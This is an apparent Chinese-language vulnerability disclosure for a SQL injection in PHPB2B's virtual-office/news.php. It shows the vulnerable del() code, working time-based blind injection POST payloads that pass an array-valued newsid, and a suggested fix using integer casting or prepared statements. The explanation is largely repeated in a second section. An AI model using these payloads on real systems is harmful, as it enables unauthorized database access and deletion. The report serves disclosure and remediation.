### 简要描述: PHPB2B某处sql注入#4 ### 详细说明: PHPB2B某处sql注入 官网下载的最新版本 virtual-office/news.php 73-80行 ``` if (isset($_POST['del'])) { $result = $companynews->del($_POST['newsid'], $conditions); if ($result) { flash("success"); }else { flash("action_failed"); } } ``` post的数据传入del函数,跟入看看。 ``` function del($ids, $conditions = null, $table = null) { $del_id = $this->primaryKey; $tmp_ids = $condition = null; if (is_array($ids)) { $tmp_ids = implode(",",$ids); $cond[] = "{$del_id} IN ({$tmp_ids})"; $this->catchIds = serialize($ids); } else { $cond[] = "{$del_id}=".intval($ids); $this->catchIds = $ids; } if (!empty($table)) { $table_name = $this->table_prefix.$table; }else{ $table_name = $this->getTable(); } if(!empty($conditions)) { if(is_array($conditions)) { $tmp_where_cond = implode(" AND ", $conditions); $cond[] = $tmp_where_cond; } else { $cond[] = $conditions; } } $this->setCondition($cond); $sql = "DELETE FROM ".$table_name.$this->getCondition(); $deleted = $this->dbstuff->Execute($sql);...
### 简要描述: PHPB2B某处sql注入#4

### 详细说明:

PHPB2B某处sql注入，官网下载的最新版本。

virtual-office/news.php 73-80行：

```php
if (isset($_POST['del'])) {
    $result = $companynews->del($_POST['newsid'], $conditions);
    if ($result) {
        flash("success");
    }else {
        flash("action_failed");
    }
}
```

`$_POST['newsid']` 未经任何处理直接传入 del 函数（注意：PHP 会把 `newsid[]=...` 形式的参数解析成数组，所以调用方无法假设它一定是标量），跟入看看。

```php
function del($ids, $conditions = null, $table = null) {
    $del_id = $this->primaryKey;
    $tmp_ids = $condition = null;
    if (is_array($ids)) {
        $tmp_ids = implode(",",$ids);
        $cond[] = "{$del_id} IN ({$tmp_ids})";
        $this->catchIds = serialize($ids);
    } else {
        $cond[] = "{$del_id}=".intval($ids);
        $this->catchIds = $ids;
    }
    if (!empty($table)) {
        $table_name = $this->table_prefix.$table;
    }else{
        $table_name = $this->getTable();
    }
    if(!empty($conditions)) {
        if(is_array($conditions)) {
            $tmp_where_cond = implode(" AND ", $conditions);
            $cond[] = $tmp_where_cond;
        } else {
            $cond[] = $conditions;
        }
    }
    $this->setCondition($cond);
    $sql = "DELETE FROM ".$table_name.$this->getCondition();
    $deleted = $this->dbstuff->Execute($sql);
    unset($this->condition);
    return $deleted;
}
```

关键在这一句：

```php
if (is_array($ids)) {
    $tmp_ids = implode(",",$ids);
    $cond[] = "{$del_id} IN ({$tmp_ids})";
    $this->catchIds = serialize($ids);
} else {
    $cond[] = "{$del_id}=".intval($ids);
    $this->catchIds = $ids;
}
```

如果传入的 `$ids` 是标量，会经过 `intval()` 强制转换为整数；但如果传入的是数组，就直接 `implode(",", $ids)` 把每个元素原样拼进 `IN (...)`，既没有对每个元素做类型转换，两边也没有用单引号括起来（数字上下文）。因此攻击者只要以 `newsid[]=` 的形式提交，即可把任意字符串拼入 SQL；由于 payload 里不需要引号，magic_quotes_gpc/addslashes 起不到任何保护作用，即"无视 GPC"。后面由调用方传入的 `$conditions` 虽然会一并被加入 `$cond`，但 payload 末尾的 `%23`（`#`）会把它注释掉，所以注入的表达式不受其约束。

因为这是一条 DELETE 语句，没有回显，只能做时间盲注。注意 `WHERE` 条件是逐行求值的：`id IN (1123,123) || if(...,sleep(3),0)` 会对表中每一行执行一次 `sleep(3)`，表为空时不会有任何延时，延时总长也会随行数线性增长；同时 `if()` 返回 0，`||` 两侧都为假，只会删除 id 为 1123/123 的行——测试时务必像 PoC 一样使用不存在的 id，否则真实数据会被删掉。

演示。POST 提交 url：

```
localhost/phpb2b/virtual-office/news.php
```

提交内容：

```
del=1&newsid[]=1123,123)||if(1=1,sleep(3),0)%23
```

成功延时。

```
del=1&newsid[]=1123,123)||if(1=2,sleep(3),0)%23
```

不延时。

PS：工作人员在测试时，一定记得先加上一条新闻，确保表中有数据（原因见上：sleep 是逐行触发的）。另外该页面位于 virtual-office 目录下，是否需要先登录才能到达这段代码，报告中未说明，复现时需留意。

修复建议：数组分支也要逐元素做整数转换，和标量分支保持一致，例如 `$tmp_ids = implode(",", array_map('intval', $ids));`（空数组时应直接返回，避免生成 `IN ()` 这样的非法 SQL）；更彻底的做法是改为预处理语句/参数绑定，而不是字符串拼接 SQL。

### 漏洞证明:

PHPB2B某处sql注入，官网下载的最新版本。

virtual-office/news.php 73-80行：

```php
if (isset($_POST['del'])) {
    $result = $companynews->del($_POST['newsid'], $conditions);
    if ($result) {
        flash("success");
    }else {
        flash("action_failed");
    }
}
```

post的数据传入del函数，跟入看看。

```php
function del($ids, $conditions = null, $table = null) {
    $del_id = $this->primaryKey;
    $tmp_ids = $condition = null;
    if (is_array($ids)) {
        $tmp_ids = implode(",",$ids);
        $cond[] = "{$del_id} IN ({$tmp_ids})";
        $this->catchIds = serialize($ids);
    } else {
        $cond[] = "{$del_id}=".intval($ids);
        $this->catchIds = $ids;
    }
    if (!empty($table)) {
        $table_name = $this->table_prefix.$table;
    }else{
        $table_name = $this->getTable();
    }
    if(!empty($conditions)) {
        if(is_array($conditions)) {
            $tmp_where_cond = implode(" AND ", $conditions);
            $cond[] = $tmp_where_cond;
        } else {
            $cond[] = $conditions;
        }
    }
    $this->setCondition($cond);
    $sql = "DELETE FROM ".$table_name.$this->getCondition();
    $deleted = $this->dbstuff->Execute($sql);
    unset($this->condition);
    return $deleted;
}
```

关键在这一句：

```php
if (is_array($ids)) {
    $tmp_ids = implode(",",$ids);
    $cond[] = "{$del_id} IN ({$tmp_ids})";
    $this->catchIds = serialize($ids);
} else {
    $cond[] = "{$del_id}=".intval($ids);
    $this->catchIds = $ids;
}
```

如果传入的 `$ids` 是数组，就没有 `intval` 强制类型转换了，每个元素被原样拼进 `IN (...)`，并且两边没有用单引号括起来。于是这里出现了注入，无视 GPC。

因为是 DELETE 型，无回显，使用时间盲注。

演示。POST 提交 url：

```
localhost/phpb2b/virtual-office/news.php
```

提交内容：

```
del=1&newsid[]=1123,123)||if(1=1,sleep(3),0)%23
```

成功延时。

```
del=1&newsid[]=1123,123)||if(1=2,sleep(3),0)%23
```

不延时。

PS：工作人员在测试时，一定记得先加上一条新闻，确保表中有数据；PoC 中的 1123/123 应保持为不存在的 id，以免删除真实数据。